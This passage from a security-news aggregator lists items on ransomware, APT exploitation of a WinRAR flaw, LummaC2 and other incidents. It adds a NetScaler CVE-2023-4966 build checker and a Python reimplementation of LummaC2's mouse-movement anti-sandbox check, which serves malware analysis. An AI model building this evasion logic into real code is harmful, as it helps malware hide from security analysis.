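            The fixed-build boundaries in the advisory above are easy to misread when a FIPS or NDcPP appliance is involved, because those branches carry different build numbers from the standard line. The following check encodes the advisory's list so a build string can be classified mechanically. This is an added example and not code from the CISA advisory or the Citrix bulletin; the two accepted input formats, the bulletin's "13.1-49.13" style and the "NetScaler NS13.1: Build 49.13.nc" style printed by the appliance's "show ns version", are assumptions made for this example.

```python
"""Classify a NetScaler ADC / NetScaler Gateway build against the CVE-2023-4966 fixed builds.

Added example (not code from the CISA advisory or the Citrix bulletin). The fixed
builds are the ones listed in the advisory; the accepted input formats are assumed.
"""
import re
from typing import Dict, Tuple

Build = Tuple[int, int]

# (release line, appliance variant) -> first build that carries the fix, per the advisory.
# A build on that line is vulnerable when it compares strictly below the fixed build.
FIXED_BUILDS: Dict[Tuple[str, str], Build] = {
    ("14.1", ""): (8, 50),
    ("13.1", ""): (49, 15),
    ("13.0", ""): (92, 19),
    ("13.1", "FIPS"): (37, 163),
    ("12.1", "FIPS"): (55, 300),
    ("12.1", "NDcPP"): (55, 300),
}

# Standard 12.1 is end of life: listed as affected with no fixed build.
EOL_LINES = {("12.1", "")}

# "13.1-49.13" (bulletin style) or "NetScaler NS13.1: Build 49.13.nc, Date: ..." (assumed CLI style)
_BULLETIN_RE = re.compile(r"^(\d+\.\d+)-(\d+)\.(\d+)$")
_CLI_RE = re.compile(r"NS(\d+\.\d+):\s*Build\s+(\d+)\.(\d+)")


def parse_version(text: str) -> Tuple[str, Build]:
    """Return (release line, (major build, minor build)); raise ValueError on unknown input."""
    text = text.strip()
    m = _BULLETIN_RE.match(text) or _CLI_RE.search(text)
    if m is None:
        raise ValueError(f"unrecognised NetScaler version string: {text!r}")
    line, major, minor = m.groups()
    return line, (int(major), int(minor))


def normalise_variant(variant: str) -> str:
    """Map operator input ('', 'fips', 'NDcPP', ...) onto the keys used in FIXED_BUILDS."""
    v = variant.strip().upper()
    if v in ("", "STANDARD"):
        return ""
    if v == "FIPS":
        return "FIPS"
    if v == "NDCPP":
        return "NDcPP"
    raise ValueError(f"unknown appliance variant: {variant!r}")


def assess(text: str, variant: str = "") -> str:
    """Return 'vulnerable', 'fixed', 'eol' or 'unknown' (line not named in the bulletin).

    `variant` must be given for FIPS / NDcPP appliances: the build string alone does not
    say which branch it is on, and 13.1-37.163 is fixed on FIPS but below the 13.1 fix.
    """
    line, build = parse_version(text)
    key = (line, normalise_variant(variant))
    if key in EOL_LINES:
        return "eol"
    fixed = FIXED_BUILDS.get(key)
    if fixed is None:
        return "unknown"
    return "vulnerable" if build < fixed else "fixed"


if __name__ == "__main__":
    # Constructed sample inputs, not output from a real appliance.
    samples = [
        ("13.1-49.13", ""), ("13.1-49.15", ""),
        ("NetScaler NS13.0: Build 91.13.nc, Date: Jun 7 2023", ""),
        ("13.1-37.163", "FIPS"), ("13.1-37.163", ""), ("12.1-65.25", ""),
    ]
    for sample, variant in samples:
        print(f"{sample!r:55} {variant or 'std':5} -> {assess(sample, variant)}")
```

            A build that classifies as "fixed" only closes the memory-disclosure bug; because Citrix Bleed leaks session tokens, sessions created before the upgrade remain usable until they are terminated, so the version check is a first step and the session purge described in the advisory still has to follow.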


            Lumma malware can allegedly restore expired Google auth cookies

            exploits
            2023-11-21 https://www.bleepingcomputer.com/news/security/lumma-malware-can-allegedly-restore-expired-google-auth-cookies/
            The Lumma information-stealer malware (aka "LummaC2") is promoting a new feature that allegedly allows cybercriminals to restore expired Google cookies, which can be used to hijack Google accounts. [...] "

            Autosummary: " Lumma announcing new, powerful feature Source: BleepingComputer This new feature was only made available to subscribers of the highest-tier "Corporate" plan, which costs cybercriminals $1,000/month. "


            Binance chief Changpeng Zhao pleads guilty to money laundering charges

            financial
            2023-11-21 https://www.bbc.co.uk/news/technology-67492753?at_medium=RSS&at_campaign=KARANGA
            Changpeng Zhao will also step down as chief executive of the world's largest crypto-exchange. "

            Autosummary: "


            Malware dev says they can revive expired Google auth cookies

            exploits
            2023-11-21 https://www.bleepingcomputer.com/news/security/malware-dev-says-they-can-revive-expired-google-auth-cookies/
            The Lumma information-stealer malware (aka "LummaC2") is promoting a new feature that allegedly allows cybercriminals to restore expired Google cookies, which can be used to hijack Google accounts. [...] "

            Autosummary: " Lumma announcing new, powerful feature Source: BleepingComputer This new feature was only made available to subscribers of the highest-tier "Corporate" plan, which costs cybercriminals $1,000/month. "


            Far-right outsider Milei wins Argentina presidential run-off election

            latam
            2023-11-20 https://www.bbc.co.uk/news/world-latin-america-67470549?at_medium=RSS&at_campaign=KARANGA
            Ex-US President Donald Trump congratulates Javier Milei, saying he will "Make Argentina Great Again". "

            Autosummary: "


            Radical political change in Argentina and an uncertain future

            latam
            2023-11-20 https://www.bbc.co.uk/news/world-latin-america-67470710?at_medium=RSS&at_campaign=KARANGA
            Javier Milei's victory sends a clear message - Argentinians wanted change and he was likely to deliver it. "

            Autosummary: "


            Optus: Telecom boss Kelly Bayer Rosmarin quits after Australian outage

            Telcos
            2023-11-20 https://www.bbc.co.uk/news/world-australia-67470796?at_medium=RSS&at_campaign=KARANGA
            Kelly Bayer Rosmarin has been under pressure to quit after overseeing a tumultuous period for the firm. "

            Autosummary: "


            Outsmarting cybercriminals is becoming a hard thing to do

            ciber
            2023-11-20 https://www.helpnetsecurity.com/2023/11/20/cybercriminals-techniques-video/

            Cybercriminals have evolved into organized and highly adaptive networks, collaborating globally to exploit weaknesses in cybersecurity defenses. Their motivations range from financial gain and information theft to political espionage and ideological warfare. Cybercriminals, now more than ever, are exploiting vulnerabilities in cybersecurity defenses and constantly shaping their strategies in response to technological advancements. In this Help Net Security round-up, we present segments from previously recorded videos in which cybersecurity experts discuss the tactics and techniques … More

            The post Outsmarting cybercriminals is becoming a hard thing to do appeared first on Help Net Security.

            "

            Autosummary: "


            9 Black Friday cybersecurity deals you don’t want to miss

            ciber
            2023-11-20 https://www.helpnetsecurity.com/2023/11/20/black-friday-cybersecurity-deals/

            PortDroid PortDroid is a trusted app for all network analysis tasks. Designed with network administrators, penetration testers, and technology enthusiasts in mind, this app brings a collection of essential networking tools right at your fingertips. Deal: 50% off Promo code: CYBER_2023 7ASecurity 7ASecurity offers IT security training courses including Android, iOS, Node.js, Electron, Secure Development, and security awareness. Deal: 50% off on any course Promo code: BFCM50 LetsDefend LetsDefend helps you build a blue team … More

            The post 9 Black Friday cybersecurity deals you don’t want to miss appeared first on Help Net Security.

            "

            Autosummary: "


            Randstorm Exploit: Bitcoin Wallets Created b/w 2011-2015 Vulnerable to Hacking

            exploits
            2023-11-20 https://thehackernews.com/2023/11/randstorm-exploit-bitcoin-wallets.html
            Bitcoin wallets created between 2011 and 2015 are susceptible to a new kind of exploit called Randstorm that makes it possible to recover passwords and gain unauthorized access to a multitude of wallets spanning several blockchain platforms. "Randstorm() is a term we coined to describe a collection of bugs, design decisions, and API changes that, when brought in contact with each other, combine "

            Autosummary: "


            DarkCasino joins the list of APT groups exploiting WinRAR zero-day

            exploits
            2023-11-20 https://securityaffairs.com/154414/apt/darkcasino-apt-exploiting-winrar-0day.html
            The DarkCasino APT group leveraged a recently disclosed WinRAR zero-day vulnerability tracked as CVE-2023-38831. Researchers at cybersecurity firm NSFOCUS analyzed the DarkCasino attack pattern exploiting the WinRAR zero-day vulnerability tracked as CVE-2023-38831. The economically motivated APT group used specially crafted archives in phishing attacks against forum users through online trading forum posts. “DarkCasino is an APT […] "

            Autosummary: Multiple APT groups have been observed exploiting the CVE-2023-38831 vulnerability, including Dark Pink, APT28, APT29, Sandworm, APT40, Ghostwriter, and Konni. "


            Sophos Web Appliance vulnerability exploited in the wild (CVE-2023-1671)

            exploits
            2023-11-20 https://www.helpnetsecurity.com/2023/11/20/cve-2023-1671/

            CISA has added three vulnerabilities to its Known Exploited Vulnerabilities catalog, among them a critical vulnerability (CVE-2023-1671) in Sophos Web Appliance that has been patched by the company in April 2023. About CVE-2023-1671 CVE-2023-1671 is a pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance that allows attackers to execute arbitrary code. Sophos Web Appliance is a web gateway appliance that functions as a web proxy and scans potentially harmful content for … More

            The post Sophos Web Appliance vulnerability exploited in the wild (CVE-2023-1671) appeared first on Help Net Security.

            "

            Autosummary: "


            Resecurity partners with University of Jeddah to improve cybersecurity education

            ciber
            2023-11-20 https://www.helpnetsecurity.com/2023/11/20/resecurity-university-of-jeddah-partnership/

            Resecurity announced a strategic partnership with University of Jeddah, one of the leaders in higher education in the Kingdom of Saudi Arabia, to further strengthen the country’s cybersecurity talent pipeline and facilitate capacity building programs for academia. This landmark partnership aims to enhance cybersecurity education by delivering cutting-edge training programs and fostering collaboration in key areas of expertise. Recognizing the evolving landscape of cybersecurity threats, Resecurity and the University of Jeddah aim to equip students … More

            The post Resecurity partners with University of Jeddah to improve cybersecurity education appeared first on Help Net Security.

            "

            Autosummary: "


            LummaC2 Malware Deploys New Trigonometry-Based Anti-Sandbox Technique

            exploits
            2023-11-20 https://thehackernews.com/2023/11/lummac2-malware-deploys-new.html
            The stealer malware known as LummaC2 (aka Lumma Stealer) now features a new anti-sandbox technique that leverages the mathematical principle of trigonometry to evade detection and exfiltrate valuable information from infected hosts. The method is designed to "delay detonation of the sample until human mouse activity is detected," Outpost24 security researcher Alberto Marín said in a technical "

            Autosummary: Once all the five cursor positions (P0, P1, P2, P3, and P4) meet the requirements, LummaC2 treats them as Euclidean vectors and calculates the angle that's formed between two consecutive vectors (P01-P12, P12-P23, and P23-P34). "
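            The angle test described above is short enough to show end to end, and it is also useful on the defensive side: a sandbox that emulates mouse movement with large random jumps will fail the same check the malware applies. The code below is an added example written for this page, not LummaC2 code and not taken from the Outpost24 report. The 45-degree limit, the 300 ms sampling interval, the rule that consecutive samples must differ, and the use of an injected sampler in place of a GetCursorPos call are assumptions made for this example.

```python
"""Mouse-movement "humanness" check of the kind the LummaC2 write-up describes.

Added example for illustration; not LummaC2 code. The threshold, the sampling
interval and the sampler injection are assumptions.
"""
import math
from typing import Callable, List, Sequence, Tuple

Point = Tuple[float, float]
Vector = Tuple[float, float]

ANGLE_LIMIT_DEG = 45.0   # assumed: a sharper turn than this between samples is treated as non-human
SAMPLE_COUNT = 5         # P0..P4 as in the report
INTERVAL_S = 0.3         # assumed sampling interval between cursor reads


def movement_vectors(points: Sequence[Point]) -> List[Vector]:
    """P01, P12, P23, P34: displacement between each pair of consecutive samples."""
    return [(b[0] - a[0], b[1] - a[1]) for a, b in zip(points, points[1:])]


def angle_between_deg(u: Vector, v: Vector) -> float:
    """Unsigned angle between two movement vectors, in degrees."""
    nu, nv = math.hypot(*u), math.hypot(*v)
    if nu == 0 or nv == 0:
        raise ValueError("zero-length movement vector: cursor did not move")
    cos_theta = (u[0] * v[0] + u[1] * v[1]) / (nu * nv)
    cos_theta = max(-1.0, min(1.0, cos_theta))   # guard against rounding outside [-1, 1]
    return math.degrees(math.acos(cos_theta))


def samples_are_distinct(points: Sequence[Point]) -> bool:
    """Requirement on the captures: each position differs from the one before it."""
    return all(a != b for a, b in zip(points, points[1:]))


def looks_human(points: Sequence[Point], limit_deg: float = ANGLE_LIMIT_DEG) -> bool:
    """True when five distinct samples turn by less than limit_deg at every step."""
    if len(points) != SAMPLE_COUNT or not samples_are_distinct(points):
        return False
    vecs = movement_vectors(points)
    angles = [angle_between_deg(u, v) for u, v in zip(vecs, vecs[1:])]
    return all(a < limit_deg for a in angles)


def wait_for_human(sample_cursor: Callable[[], Point],
                   sleep: Callable[[float], None] = lambda s: None,
                   max_rounds: int = 100) -> int:
    """Repeat the five-sample check until it passes.

    Returns the round number on which it passed, or -1 after max_rounds. On Windows
    the sampler would wrap GetCursorPos and sleep would be time.sleep; both are
    injected here so the logic runs anywhere, including in a test.
    """
    for round_no in range(1, max_rounds + 1):
        points = []
        for _ in range(SAMPLE_COUNT):
            points.append(sample_cursor())
            sleep(INTERVAL_S)
        if looks_human(points):
            return round_no
    return -1


if __name__ == "__main__":
    # Constructed traces, not captured from a real host.
    smooth = [(0, 0), (10, 2), (20, 6), (30, 12), (40, 20)]
    jerky = [(0, 0), (10, 0), (10, 10), (0, 10), (0, 0)]
    idle = [(5, 5)] * 5
    for name, trace in [("smooth", smooth), ("jerky", jerky), ("idle", idle)]:
        print(f"{name:7} -> human={looks_human(trace)}")
```

            The idle trace is the case that matters for analysis: a sandbox whose cursor never moves never satisfies the check, so the sample simply waits, which is what "delay detonation until human mouse activity is detected" means in practice. Feeding the sample a slow, smoothly curving cursor path is enough to get past this particular gate.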


            Russia-linked APT29 group exploited WinRAR 0day in attacks against embassies

            exploits
            2023-11-20 https://securityaffairs.com/154460/apt/apt29-targets-embassies-winrar-flaw.html
            Russia-linked cyberespionage group APT29 has been observed leveraging the CVE-2023-38831 vulnerability in WinRAR in recent attacks. The Ukrainian National Security and Defense Council (NDSC) reported that APT29 (aka SVR group, Cozy Bear, Nobelium, Midnight Blizzard, and The Dukes) has been exploiting the CVE-2023-38831 vulnerability in WinRAR in recent attacks. APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee […] "

            Autosummary: Russia-linked APT29 group exploited WinRAR 0day in attacks against embassies Pierluigi Paganini November 20, 2023 November 20, 2023 Russia-linked cyberespionage group APT29 has been observed leveraging the CVE-2023-38831 vulnerability in WinRAR in recent attacks. "


            Canadian government discloses data breach after contractor hacks

            financial government
            2023-11-20 https://www.bleepingcomputer.com/news/security/canadian-government-discloses-data-breach-after-contractor-hacks/
            The Canadian government says two of its contractors have been hacked, exposing sensitive information belonging to an undisclosed number of government employees.  [...] "

            Autosummary: "


            Kinsing malware exploits Apache ActiveMQ RCE to plant rootkits

            exploits
            2023-11-20 https://www.bleepingcomputer.com/news/security/kinsing-malware-exploits-apache-activemq-rce-to-plant-rootkits/
            The Kinsing malware operator is actively exploiting the CVE-2023-46604 critical vulnerability in the Apache ActiveMQ open-source message broker to compromise Linux systems. [...] "

            Autosummary: “In the context of Kinsing, CVE-2023-46604 is exploited to download and execute Kinsing cryptocurrency miners and malware on a vulnerable system” - Trend Micro The malware uses the ‘ProcessBuilder’ method to execute malicious bash scripts and download additional payloads on the infected device from within newly created system-level processes. "


            Rhysida ransomware gang claims British Library cyberattack

            exploits ransomware ciber
            2023-11-20 https://www.bleepingcomputer.com/news/security/rhysida-ransomware-gang-claims-british-library-cyberattack/
            The Rhysida ransomware gang has claimed responsibility for a cyberattack on the British Library in October, which has caused a major ongoing IT outage. [...] "

            Autosummary: "Threat actors leveraging Rhysida ransomware are known to impact "targets of opportunity," including victims in the education, healthcare, manufacturing, information technology, and government sectors," the two agencies said. "


            Lumma Stealer malware now uses trigonometry to evade detection

            exploits
            2023-11-20 https://www.bleepingcomputer.com/news/security/lumma-stealer-malware-now-uses-trigonometry-to-evade-detection/
            The Lumma information-stealing malware is now using an interesting tactic to evade detection by security software - the measuring of mouse movements using trigonometry to determine if the malware is running on a real machine or an antivirus sandbox. [...] "

            Autosummary: Crypter requirement highlighted in a forum post (Outpost24) As a last line of defense against scrutiny, Lumma 4.0 incorporates obstacles within its code, like opaque predicates that unnecessarily complicate the program's logic, and blocks of dead code injected within functional code segments to create confusion and analysis errors. "


            Student discount: Get 50% off Malwarebytes

            exploits
            2023-11-20 https://www.malwarebytes.com/blog/personal/2023/11/student-discount-get-50-off-malwarebytes
            We’ve got good news. Malwarebytes is now offering 50% off our products to students, wherever you are in the world. "

            Autosummary: "


            NetSupport RAT Infections on the Rise - Targeting Government and Business Sectors

            government
            2023-11-20 https://thehackernews.com/2023/11/netsupport-rat-infections-on-rise.html
            Threat actors are targeting the education, government and business services sectors with a remote access trojan called NetSupport RAT. "The delivery mechanisms for the NetSupport RAT encompass fraudulent updates, drive-by downloads, utilization of malware loaders (such as GHOSTPULSE), and various forms of phishing campaigns," VMware Carbon Black researchers said in a report shared with The "

            Autosummary: "


            DarkGate and PikaBot Malware Resurrect QakBot's Tactics in New Phishing Attacks

            financial exploits industry
            2023-11-20 https://thehackernews.com/2023/11/darkgate-and-pikabot-malware-resurrect.html
            Phishing campaigns delivering malware families such as DarkGate and PikaBot are following the same tactics previously used in attacks leveraging the now-defunct QakBot trojan. “These include hijacked email threads as the initial infection, URLs with unique patterns that limit user access, and an infection chain nearly identical to what we have seen with QakBot delivery,” Cofense said in a report "

            Autosummary: "


            Lionel Messi: Six of Argentina captain's shirts from Qatar World Cup triumph to be sold at auction

            latam
            2023-11-20 https://www.bbc.co.uk/sport/football/67472156?at_medium=RSS&at_campaign=KARANGA
            Six of the shirts worn by Lionel Messi during Argentina's 2022 World Cup-winning campaign in Qatar are to be sold at auction and expected to fetch more than £8m. "

            Autosummary: "


            VX-Underground malware collective framed by Phobos ransomware

            exploits ransomware
            2023-11-20 https://www.bleepingcomputer.com/news/security/vx-underground-malware-collective-framed-by-phobos-ransomware/
            A new Phobos ransomware variant frames the popular VX-Underground malware-sharing collective, indicating the group is behind attacks using the encryptor. [...] "

            Autosummary: For example, when REvil's precursor, GandCrab, was released, the threat actors named their command and control servers after BleepingComputer, Emsisoft, ESET, and NoMoreRansom. "


            Cybersecurity firm executive pleads guilty to hacking hospitals

            ciber
            2023-11-20 https://www.bleepingcomputer.com/news/security/cybersecurity-firm-executive-pleads-guilty-to-hacking-hospitals/
            The former chief operating officer of a cybersecurity company has pleaded guilty to hacking two hospitals, part of the Gwinnett Medical Center (GMC), in June 2021 to boost his company's business. [...] "

            Autosummary: "


            Canadian government impacted by data breaches of two of its contractors

            financial government
            2023-11-20 https://securityaffairs.com/154492/data-breach/data-breaches-impact-canadian-government.html
            The Canadian government discloses a data breach after threat actors hacked two of its contractors. The Canadian government declared that two of its contractors, Brookfield Global Relocation Services (BGRS) and SIRVA Worldwide Relocation & Moving Services, have been hacked, resulting in the exposure of sensitive information belonging to an undisclosed number of government employees. Data belonging […] "

            Autosummary: “Sirva.com says that all their information worth only $1m. We have over 1.5TB of documents leaked + 3 full backups of CRM for branches (eu, na and au) Sirva Worldwide, Inc. provides HR and mobility professionals with the resources, guidance, and support they need to achieve the best possible relocation for talent, and for the companies that move them.” reads the statement published by Lockbit on its Tor leak site that confirms the failure of a negotiation. "


            Rhysida ransomware gang is auctioning data stolen from the British Library

            exploits ransomware
            2023-11-20 https://securityaffairs.com/154473/data-breach/rhysida-ransomware-gang-british-library.html
            The Rhysida ransomware group claimed responsibility for the recent cyberattack on the British Library that has caused a major IT outage. The Rhysida ransomware gang added the British Library to the list of victims on its Tor leak site. The British Library is a research library in London that is the national library of the […] "

            Autosummary: While our website is unavailable following a major technology outage caused by a cyber-attack, we’re keeping our blog up to date with what’s on at the Library: https://t.co/8tzhn37lew We’ve just uploaded more events up until 14 December, including our current season of Fantasy… — British Library (@britishlibrary) November 17, 2023 Three hours ago the British Library said that it is continuing to experience a major technology outage that is impacting its website, online systems and services, and some on-site services. “Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors.” The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. "


            Gamaredon's LittleDrifter USB malware spreads beyond Ukraine

            exploits
            2023-11-20 https://www.bleepingcomputer.com/news/security/gamaredons-littledrifter-usb-malware-spreads-beyond-ukraine/
            A recently discovered worm that researchers call LittleDrifter has been spreading over USB drives infecting systems in multiple countries as part of a campaign from the Gamaredon state-sponsored espionage group. [...] "

            Autosummary: Malware researchers saw indications of compromise in the United States, Ukraine, Germany, Vietnam, Poland, Chile, and Hong Kong, which suggests that the threat group lost control of LittleDrifter, which reached unintended targets. "


            Scattered Spider ransomware gang falls under government agency scrutiny

            exploits government ransomware
            2023-11-20 https://www.malwarebytes.com/blog/news/2023/11/scattered-spider-ransomware-gang-falls-under-government-agency-scrutiny
            Ransomware group Scattered Spider, aka Octo Tempest, is a master of social engineering tactics like SIM swapping. "

            Autosummary: CISA and the FBI consider Scattered Spider to be experts that use multiple social engineering techniques, especially phishing, push bombing, and SIM swap attacks, to obtain credentials, install remote access tools, and bypass multi-factor authentication (MFA). Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Once the group establishes access, Scattered Spider often searches the victim’s Slack, Microsoft Teams, and Microsoft Exchange Online for emails or conversations regarding the intrusion, along with any security response, to see if their attack has been discovered. "


            8Base ransomware operators use a new variant of the Phobos ransomware

            exploits ransomware
            2023-11-19 https://securityaffairs.com/154383/malware/8base-ransomware-phobos-ransomware.html
            8Base ransomware operators were observed using a variant of the Phobos ransomware in a recent wave of attacks. Cisco Talos researchers observed 8Base ransomware operators using a variant of the Phobos ransomware in recent attacks. Phobos variants are usually distributed by the SmokeLoader, but in 8Base campaigns, it has the ransomware component embedded in its encrypted payloads. The […] "

            Autosummary: The group has been active since March 2022, it focused on small and medium-size businesses in multiple industries, including finance, manufacturing, business services, and IT. Pierluigi Paganini November 19, 2023 November 19, 2023 8Base ransomware operators were observed using a variant of the Phobos ransomware in a recent wave of attacks. "


            Russian hackers use Ngrok feature and WinRAR exploit to attack embassies

            exploits rusia-ucrania
            2023-11-19 https://www.bleepingcomputer.com/news/security/russian-hackers-use-ngrok-feature-and-winrar-exploit-to-attack-embassies/
            After Sandworm and APT28 (known as Fancy Bear), another state-sponsored Russian hacker group, APT29, is leveraging the CVE-2023-38831 vulnerability in WinRAR for cyberattacks. [...] "

            Autosummary: Lure from Russian APT28 hackers with WinRAR exploit to target political entities source: ESET A report from Google in October notes that the security issue was exploited by Russian and Chinese state hackers to steal credentials and other sensitive data, as well as to establish persistence on target systems. "


            Will Argentina vote in a radical politician to fix the economy?

            latam
            2023-11-18 https://www.bbc.co.uk/news/world-latin-america-67438517?at_medium=RSS&at_campaign=KARANGA
            Voters focus on candidates' plans to tackle rising prices as inflation soars past an annual 140%. "

            Autosummary: "


            Thornaby: Woman targeted in £13k train station QR code scam

            financial
            2023-11-18 https://www.bbc.co.uk/news/uk-england-tees-67335952?at_medium=RSS&at_campaign=KARANGA
            Rail firm TransPennine Express has since removed QR codes from all of its station car parks. "

            Autosummary: "


            Russian Cyber Espionage Group Deploys LitterDrifter USB Worm in Targeted Attacks

            rusia-ucrania
            2023-11-18 https://thehackernews.com/2023/11/russian-cyber-espionage-group-deploys.html
            Russian cyber espionage actors affiliated with the Federal Security Service (FSB) have been observed using a USB propagating worm called LitterDrifter in attacks targeting Ukrainian entities. Check Point, which detailed Gamaredon's (aka Aqua Blizzard, Iron Tilden, Primitive Bear, Shuckworm, and Winterflounder) latest tactics, branded the group as engaging in large-scale campaigns that are

            Autosummary: The intrusions, attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, Midnight Blizzard, and The Dukes), involve the exploitation of the recently disclosed WinRAR vulnerability (CVE-2023-38831) via benign-looking lures that claim to offer BMWs for sale, a theme it has employed in the past.


            8Base Group Deploying New Phobos Ransomware Variant via SmokeLoader

            exploits ransomware
            2023-11-18 https://thehackernews.com/2023/11/8base-group-deploying-new-phobos.html
            The threat actors behind the 8Base ransomware are leveraging a variant of the Phobos ransomware to conduct their financially motivated attacks. The findings come from Cisco Talos, which has recorded an increase in activity carried out by cybercriminals. “Most of the group’s Phobos variants are distributed by SmokeLoader, a backdoor trojan," security researcher Guilherme Venere said in an

            Autosummary: "It implies, however, that once the private RSA key is known, any file encrypted by any Phobos variant since 2019 can reliably be decrypted." Phobos, which first emerged in 2019, is an evolution of the Dharma (aka Crysis) ransomware, with the ransomware predominantly manifesting as the variants Eking, Eight, Elbie, Devos, and Faust, based on the volume of artifacts unearthed on VirusTotal. "Establish a minimum ransom request depending on the company's yearly revenue, for example at 3%, and prohibit discounts of more than 50%," the LockBit operators said, according to a detailed report from Analyst1.


            Russian APT Gamaredon uses USB worm LitterDrifter against Ukraine

            rusia-ucrania
            2023-11-18 https://securityaffairs.com/154362/apt/gamaredon-apt-litterdrifter-usb.html
            Russia-linked cyberespionage group Gamaredon has been spotted propagating a worm called LitterDrifter via USB. Check Point researchers observed Russia-linked Gamaredon spreading the worm called LitterDrifter via USB in attacks against Ukraine. Gamaredon (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa) has been active since 2014 and its activity focuses on Ukraine; the group was observed using the multistage backdoor Pteranodon/Pterodo. The Gamaredon APT group continues to carry out […]

            Autosummary: Gamaredon (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa) has been active since 2014 and its activity focuses on Ukraine; the group was observed using the multistage backdoor Pteranodon/Pterodo. Check Point researchers reported possible infections also in the U.S., Vietnam, Chile, Poland, Germany, and Hong Kong.


            Exploit for CrushFTP RCE chain released, patch now

            exploits
            2023-11-18 https://www.bleepingcomputer.com/news/security/exploit-for-crushftp-rce-chain-released-patch-now/
            A proof-of-concept exploit was publicly released for a critical remote code execution vulnerability in the CrushFTP enterprise suite, allowing unauthenticated attackers to access files on the server, execute code, and obtain plain-text passwords. [...]

            Autosummary: Next, the attackers overwrite session data using Java's "putAll()" function, enabling the impersonation of "administrators," and leverage the "drain_log()" function to manipulate files as needed to maintain stealthiness.


            Transforming cybersecurity from reactive to proactive with attack path analysis

            ciber
            2023-11-17 https://www.helpnetsecurity.com/2023/11/17/attack-path-analysis-video/

            An attack path is important to prioritize potential risks in cloud environments. The attack path offers the ability to look at cloud environments from the attacker’s perspective. With today’s general awareness and concerted effort toward cybersecurity, cybercriminals rarely find a single gaping loophole or a silver bullet through which an entire enterprise system is compromised. Instead, they often capitalize on a series of vulnerabilities that successively lead them to discover an exploitable path to confidential … More



            Rise in automated attacks troubles ecommerce industry

            industry
            2023-11-17 https://www.helpnetsecurity.com/2023/11/17/online-retailers-automated-attacks-threat/

            Automated attacks on application business logic, carried out by sophisticated bad bots, were the leading threat for online retailers, according to Imperva. In addition, account takeover, DDoS, API abuse, and client-side attacks were significant risks. The ecommerce industry remains a lucrative target for cybercriminal activity. Built on a vast network of API connections and third-party dependencies, online retailers are increasingly vulnerable to business logic abuse and client-side attacks. Motivated cybercriminals are also eager to compromise … More

            Autosummary: “The security risks that the retail industry faces are more sophisticated, automated, and harder to detect,” says Karl Triebes, SVP and GM, Application Security, Imperva. Security incidents spike amid the shopping season. A successful security incident can lead to higher infrastructure and support costs, degraded online services, and, ultimately, customer churn.


            U.S. Cybersecurity Agencies Warn of Scattered Spider's Gen Z Cybercrime Ecosystem

            ciber
            2023-11-17 https://thehackernews.com/2023/11/us-cybersecurity-agencies-warn-of.html
            U.S. cybersecurity and intelligence agencies have released a joint advisory about a cybercriminal group known as Scattered Spider that's known to employ sophisticated phishing tactics to infiltrate targets. "Scattered Spider threat actors typically engage in data theft for extortion using multiple social engineering techniques and have recently leveraged BlackCat/ALPHV ransomware alongside their


            CISA Adds Three Security Flaws with Active Exploitation to KEV Catalog

            exploits
            2023-11-17 https://thehackernews.com/2023/11/cisa-adds-three-security-flaws-with.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation in the wild. The vulnerabilities are as follows - CVE-2023-36584 (CVSS score: 5.4) - Microsoft Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability CVE-2023-1671 (CVSS score: 9.8) -


            AI chief quits over "exploitative" copyright row

            exploits
            2023-11-17 https://www.bbc.co.uk/news/technology-67446000?at_medium=RSS&at_campaign=KARANGA
            Former Stability AI executive says it's not acceptable to use other people's work without permission.


            British Library: Ongoing outage caused by ransomware attack

            exploits ransomware
            2023-11-17 https://www.bleepingcomputer.com/news/security/british-library-ongoing-outage-caused-by-ransomware-attack/
            The British Library confirmed that a ransomware attack is behind a major outage that is still affecting services across several locations. [...]

            Autosummary: While the attackers deployed ransomware payloads on the library's systems on Saturday, October 28, the IT outage continues to impact the British Library's website, online systems, services, and certain onsite facilities such as Wi-Fi.


            Beware: Malicious Google Ads Trick WinSCP Users into Installing Malware

            exploits
            2023-11-17 https://thehackernews.com/2023/11/beware-malicious-google-ads-trick.html
            Threat actors are leveraging manipulated search results and bogus Google ads that trick users who are looking to download legitimate software such as WinSCP into installing malware instead. Cybersecurity company Securonix is tracking the ongoing activity under the name SEO#LURKER. “The malicious advertisement directs the user to a compromised WordPress website gameeweb[.]com, which redirects the

            Autosummary: "The malicious advertisement directs the user to a compromised WordPress website gameeweb[.]com, which redirects the user to an attacker-controlled phishing site," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.


            CISA adds Sophos Web Appliance bug to its Known Exploited Vulnerabilities catalog

            exploits
            2023-11-17 https://securityaffairs.com/154310/security/cisa-known-exploited-vulnerabilities-catalog-17-nov-23.html
            US CISA added three new vulnerabilities (tracked as CVE-2023-36584, CVE-2023-1671, and CVE-2023-2551) to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added three new vulnerabilities to its Known Exploited Vulnerabilities catalog. Below is the list of the three added vulnerabilities: According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited […]


            Yamaha Motor confirms ransomware attack on Philippines subsidiary

            exploits ransomware
            2023-11-17 https://www.bleepingcomputer.com/news/security/yamaha-motor-confirms-ransomware-attack-on-philippines-subsidiary/
            Yamaha Motor's Philippines motorcycle manufacturing subsidiary was hit by a ransomware attack last month, resulting in the theft and leak of some employees' personal information. [...]

            Autosummary: "One of the servers managed by [..] motorcycle manufacturing and sales subsidiary in the Philippines, Yamaha Motor Philippines, Inc. (YMPH), was accessed without authorization by a third party and hit by a ransomware attack, and a partial leakage of employees' personal information stored by the company was confirmed," Yamaha said.


            Google: Hackers exploited Zimbra zero-day in attacks on govt orgs

            exploits
